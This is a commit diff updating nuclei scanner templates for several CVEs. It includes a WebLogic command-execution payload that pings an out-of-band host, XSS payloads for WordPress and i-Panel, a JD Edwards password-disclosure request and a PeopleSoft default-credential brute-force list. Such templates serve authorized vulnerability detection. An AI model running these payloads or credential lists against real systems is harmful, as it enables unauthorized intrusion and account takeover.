up PoCs 2022-09-23

Author: hktalent

config/nuclei-templates/cves/2017/CVE-2017-10271.yaml

@@ -2,7 +2,7 @@ id: CVE-2017-10271
 
 info:
   name: Oracle WebLogic Server - Remote Command Execution
-  author: dr_set,ImNightmaree
+  author: dr_set,ImNightmaree,true13
   severity: high
   description: |
     The Oracle WebLogic Server component of Oracle Fusion Middleware (subcomponent - WLS Security) is susceptible to remote command execution. Supported versions that are affected are 10.3.6.0.0, 12.1.3.0.0, 12.2.1.1.0 and 12.2.1.2.0. This easily exploitable vulnerability allows unauthenticated attackers with network access via T3 to compromise Oracle WebLogic Server.
@@ -42,7 +42,7 @@ requests:
                                     <string>-c</string>
                                 </void>
                                 <void index="2">
-                                    <string>interact.sh</string>
+                                    <string>ping -c 1 {{interactsh-url}}</string>
                                 </void>
                             </array>
                             <void method="start"/></void>
@@ -85,7 +85,8 @@ requests:
     matchers:
       - type: dsl
         dsl:
-          - regex("<faultstring>.*</faultstring>", body)
+          - regex("<faultstring>java.lang.ProcessBuilder || <faultstring>0", body)
+          - contains(interactsh_protocol, "dns")
           - status_code == 500
         condition: and
 

config/nuclei-templates/cves/2017/CVE-2017-8917.yaml

@@ -1,21 +1,24 @@
 id: CVE-2017-8917
 
 info:
-  name: Joomla! <3.7.1 - SQL Injection
+  name: Joomla! < 3.7.1 - SQL Injection
   author: princechaddha
   severity: critical
   description: |
     Joomla! 3.7.x before 3.7.1 contains a SQL injection vulnerability that could allow attackers to execute arbitrary SQL commands via unspecified vectors.
   reference:
-    - https://www.cvedetails.com/cve/CVE-2017-8917/
     - https://developer.joomla.org/security-centre/692-20170501-core-sql-injection.html
     - http://web.archive.org/web/20210421142819/https://www.securityfocus.com/bid/98515
     - http://web.archive.org/web/20211207050608/https://securitytracker.com/id/1038522
+    - https://nvd.nist.gov/vuln/detail/CVE-2017-8917
   classification:
     cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
     cvss-score: 9.8
     cve-id: CVE-2017-8917
     cwe-id: CWE-89
+  metadata:
+    shodan-query: http.component:"Joomla"
+    verified: "true"
   tags: cve,cve2017,joomla,sqli
 
 variables:
@@ -30,6 +33,4 @@ requests:
       - type: word
         part: body
         words:
-          - '{{md5({{num}})}}'
-
-# Enhanced by mp on 2022/05/11
+          - '{{md5(num)}}'

config/nuclei-templates/cves/2020/CVE-2020-2733.yaml

@@ -0,0 +1,41 @@
+id: CVE-2020-2733
+
+info:
+  name: JD Edwards EnterpriseOne Tools - Admin Password Disclosure
+  author: DhiyaneshDk,pussycat0x
+  severity: critical
+  description: |
+    Vulnerability in the JD Edwards EnterpriseOne Tools product of Oracle JD Edwards (component: Monitoring and Diagnostics). The supported version that is affected is 9.2. Easily exploitable vulnerability allows unauthenticated attacker with network access via HTTP to compromise JD Edwards EnterpriseOne Tools. Successful attacks of this vulnerability can result in takeover of JD Edwards EnterpriseOne Tools.
+  reference:
+    - https://redrays.io/cve-2020-2733-jd-edwards/
+    - https://www.oracle.com/security-alerts/cpuapr2020.html
+    - https://nvd.nist.gov/vuln/detail/CVE-2020-2733
+  classification:
+    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
+    cvss-score: 9.8
+    cve-id: CVE-2020-2733
+  metadata:
+    shodan-query: port:8999 product:"Oracle WebLogic Server"
+    verified: "true"
+  tags: cve,cve2020,oracle,weblogic,disclosure,exposure
+
+requests:
+  - method: GET
+    path:
+      - '{{BaseURL}}/manage/fileDownloader?sec=1'
+
+    matchers-condition: and
+    matchers:
+      - type: word
+        part: body
+        words:
+          - 'ACHCJK'
+
+      - type: word
+        part: header
+        words:
+          - "text/plain"
+
+      - type: status
+        status:
+          - 200

config/nuclei-templates/cves/2021/CVE-2021-39320.yaml

@@ -1,32 +1,46 @@
 id: CVE-2021-39320
 
 info:
-  name: WordPress underConstruction Plugin< 1.19 - Cross-Site Scripting
+  name: WordPress underConstruction Plugin < 1.19 - Cross-Site Scripting
   author: dhiyaneshDK
   severity: medium
-  description: The underConstruction plugin <= 1.18 for WordPress echoes out the raw value of `$GLOBALS['PHP_SELF']` in the ucOptions.php file. On certain configurations including Apache+modPHP, this makes it possible to use it to perform a reflected cross-site scripting attack by injecting malicious code in the request path.
+  description: |
+    The underConstruction plugin <= 1.18 for WordPress echoes out the raw value of `$GLOBALS['PHP_SELF']` in the ucOptions.php file. On certain configurations including Apache+modPHP, this makes it possible to use it to perform a reflected cross-site scripting attack by injecting malicious code in the request path.
   reference:
     - https://wpscan.com/vulnerability/49ae1df0-d6d2-4cbb-9a9d-bf3599429875
-    - https://nvd.nist.gov/vuln/detail/CVE-2021-39320
     - https://www.wordfence.com/vulnerability-advisories/#CVE-2021-39320
+    - https://nvd.nist.gov/vuln/detail/CVE-2021-39320
   classification:
     cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
     cvss-score: 6.1
     cve-id: CVE-2021-39320
     cwe-id: CWE-79
-  tags: wordpress,xss,cve,cve2021,wp-plugin,wpscan
+  metadata:
+    verified: true
+  tags: cve,cve2021,wp-plugin,wpscan,wordpress,wp,xss,authenticated
 
 requests:
-  - method: GET
-    path:
-      - '{{BaseURL}}/wp-admin/admin.php/%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E/?page=under-construction'
+  - raw:
+      - |
+        POST /wp-login.php HTTP/1.1
+        Host: {{Hostname}}
+        Content-Type: application/x-www-form-urlencoded
+
+        log={{username}}&pwd={{password}}&wp-submit=Log+In
 
+      - |
+        GET /wp-admin/admin.php/"><script>alert(document.domain)</script>/?page=under-construction HTTP/1.1
+        Host: {{Hostname}}
+
+    cookie-reuse: true
     matchers-condition: and
     matchers:
       - type: word
         part: body
         words:
-          - '</script><script>alert(document.domain)</script>'
+          - 'action="/wp-admin/admin.php/"><script>alert(document.domain)</script>'
+          - 'under-construction'
+        condition: and
 
       - type: word
         part: header
@@ -36,5 +50,3 @@ requests:
       - type: status
         status:
           - 200
-
-# Enhanced by mp on 2022/03/23

config/nuclei-templates/cves/2021/CVE-2021-41878.yaml

@@ -4,37 +4,40 @@ info:
   name: i-Panel Administration System - Cross-Site Scripting
   author: madrobot
   severity: medium
-  description: A reflected cross-site scripting vulnerability exists in the i-Panel Administration System Version 2.0 that enables a remote attacker to execute arbitrary JavaScript code in the browser-based web console.
+  description: |
+    A reflected cross-site scripting vulnerability exists in the i-Panel Administration System Version 2.0 that enables a remote attacker to execute arbitrary JavaScript code in the browser-based web console.
   reference:
-    - https://nvd.nist.gov/vuln/detail/CVE-2021-41878
     - https://cybergroot.com/cve_submission/2021-1/XSS_i-Panel_2.0.html
-    - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-41878
+    - https://nvd.nist.gov/vuln/detail/CVE-2021-41878
+    - https://github.com/nu11secur1ty/CVE-mitre/tree/main/CVE-2021-41878
   classification:
     cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
     cvss-score: 6.1
     cve-id: CVE-2021-41878
     cwe-id: CWE-79
-  tags: cve,cve2021,justwriting,xss
+  metadata:
+    verified: "true"
+  tags: cve,cve2021,ipanel,xss
 
 requests:
   - method: GET
     path:
-      - '{{BaseURL}}/lostpassword.php/%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E'
+      - '{{BaseURL}}/lostpassword.php/n4gap%22%3E%3Cimg%20src=a%20onerror=alert(%22document.domain%22)%3E'
 
     matchers-condition: and
     matchers:
-      - type: status
-        status:
-          - 200
-
       - type: word
-        words:
-          - "</script><script>alert(document.domain)</script>"
         part: body
+        words:
+          - '><img src=a onerror=alert("document.domain")>'
+          - 'i-Panel Administration'
+        condition: and
 
       - type: word
+        part: header
         words:
           - "text/html"
-        part: header
 
-# Enhanced by mp on 2022/02/27
+      - type: status
+        status:
+          - 200

config/nuclei-templates/cves/2022/CVE-2022-31373.yaml

@@ -1,11 +1,11 @@
 id: CVE-2022-31373
 
 info:
-  name: SolarView Compact 6.00 - Cross-Site Scripting
+  name: SolarView Compact 6.00 - Cross-Site Scripting(XSS)
   author: ritikchaddha
   severity: medium
   description: |
-    SolarView Compact 6.00 contains a cross-site scripting vulnerability via the Solar_AiConf.php component.
+    SolarView Compact v6.0 was discovered to contain a cross-site scripting (XSS) vulnerability via the component Solar_AiConf.php.
   reference:
     - https://github.com/badboycxcc/SolarView_Compact_6.0_xss
     - https://nvd.nist.gov/vuln/detail/CVE-2022-31373
@@ -30,6 +30,8 @@ requests:
         part: body
         words:
           - '/Solar_AiConf.php/"><script>alert(document.domain)</script>'
+          - 'HREF="Solar_Service.php"'
+        condition: and
 
       - type: word
         part: header
@@ -39,5 +41,3 @@ requests:
       - type: status
         status:
           - 200
-
-# Enhanced by mp on 2022/09/14

config/nuclei-templates/cves/2022/CVE-2022-35405.yaml

@@ -44,11 +44,18 @@ requests:
 
         <?xml version="1.0"?><methodCall><methodName>ProjectDiscovery</methodName><params><param><value>big0us</value></param></params></methodCall>
 
+    stop-at-first-match: true
     matchers:
       - type: word
         part: body
         words:
-          - "faultString"
+          - "<name>faultString</name>"
           - "No such service [ProjectDiscovery]"
-          - "methodResponse"
+        condition: or
+
+      - type: word
+        part: body
+        words:
+          - "<methodResponse>"
+          - "</methodResponse>"
         condition: or

config/nuclei-templates/default-logins/oracle/peoplesoft-default-login.yaml

@@ -0,0 +1,83 @@
+id: peoplesoft-default-login
+
+info:
+  name: Oracle PeopleSoft Default Login
+  author: LogicalHunter
+  severity: high
+  description: Oracle peoplesoft default admin credentials were discovered.
+  reference:
+    - https://www.oracle.com/applications/peoplesoft/
+    - https://erpscan.io/press-center/blog/peoplesoft-default-accounts/
+  classification:
+    cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:L/I:L/A:L
+    cvss-score: 8.3
+    cwe-id: CWE-522
+  metadata:
+    verified: true
+    shodan-query: title:"Oracle PeopleSoft Sign-in"
+  tags: default-login,peoplesoft,oracle,fuzz
+
+requests:
+  - method: POST
+    path:
+      - "{{BaseURL}}/psc/ps/?&cmd=login&languageCd=ENG"
+      - "{{BaseURL}}/psp/csperf/?&cmd=login&languageCd=ENG"
+      - "{{BaseURL}}/psp/FMPRD/?&cmd=login&languageCd=ENG"
+      - "{{BaseURL}}/psp/csprd/?&cmd=login&languageCd=ENG"
+      - "{{BaseURL}}/psp/hcmprdfp/?&cmd=login&languageCd=ENG"
+      - "{{BaseURL}}/psp/HRPRODASP/?&cmd=login&languageCd=ENG"
+      - "{{BaseURL}}/psp/guest/?&cmd=login&languageCd=ENG"
+      - "{{BaseURL}}/psp/CSPRD_PUB/?&cmd=login&languageCd=ENG"
+      - "{{BaseURL}}/psp/LHCGWPRD_1/?&cmd=login&languageCd=ENG"
+      - "{{BaseURL}}/psp/CCHIPRD_2/?&cmd=login&languageCd=ENG"
+      - "{{BaseURL}}/psp/applyuth/?&cmd=login&languageCd=ENG"
+      - "{{BaseURL}}/psp/HRPRD/?&cmd=login&languageCd=ENG"
+      - "{{BaseURL}}/psp/CAREERS/?&cmd=login&languageCd=ENG"
+      - "{{BaseURL}}/psp/heprod_5/?&cmd=login&languageCd=ENG"
+      - "{{BaseURL}}/psp/saprod/?&cmd=login&languageCd=ENG"
+      - "{{BaseURL}}/psp/hr857prd_er/?&cmd=login&languageCd=ENG"
+      - "{{BaseURL}}/psp/CHUMPRDM/?&cmd=login&languageCd=ENG"
+      - "{{BaseURL}}/psp/HR92PRD/?&cmd=login&languageCd=ENG"
+      - "{{BaseURL}}/psp/cangate_1/?&cmd=login&languageCd=ENG"
+      - "{{BaseURL}}/psp/ihprd/?&cmd=login&languageCd=ENG"
+
+    body: "timezoneOffset=360&ptmode=f&ptlangcd=ENG&ptinstalledlang=ENG&userid={{username}}&pwd={{password}}&ptlangsel=ENG"
+    headers:
+      Content-Type: application/x-www-form-urlencoded
+
+    attack: pitchfork
+    payloads:
+      username:
+        - PS
+        - VP1
+        - PSADMIN
+        - PSEM
+        - PSHC
+        - PSCR
+        - HFG
+        - PSPY
+        - HHR_JPM
+        - HHR_CMP
+      password:
+        - PS
+        - VP1
+        - PSADMIN
+        - PSEM
+        - PSHC
+        - PSCR
+        - HFG
+        - PSPY
+        - HHR_JPM
+        - HHR_CMP
+
+    stop-at-first-match: true
+    matchers-condition: and
+    matchers:
+      - type: word
+        part: header
+        words:
+          - 'Set-Cookie: PS_TOKEN='
+
+      - type: status
+        status:
+          - 302

config/nuclei-templates/exposed-panels/oracle-business-intelligence.yaml

@@ -0,0 +1,26 @@
+id: oracle-business-intelligence
+
+info:
+  name: Oracle Business Intelligence Sign In
+  author: DhiyaneshDk
+  severity: info
+  metadata:
+    verified: true
+    shodan-query: http.title:"Oracle Business Intelligence Sign In"
+  tags: panel,oracle
+
+requests:
+  - method: GET
+    path:
+      - "{{BaseURL}}/saw.dll?bieehome&startPage=1"
+
+    matchers-condition: and
+    matchers:
+      - type: word
+        part: body
+        words:
+          - "<title>Oracle Business Intelligence Sign In</title>"
+
+      - type: status
+        status:
+          - 200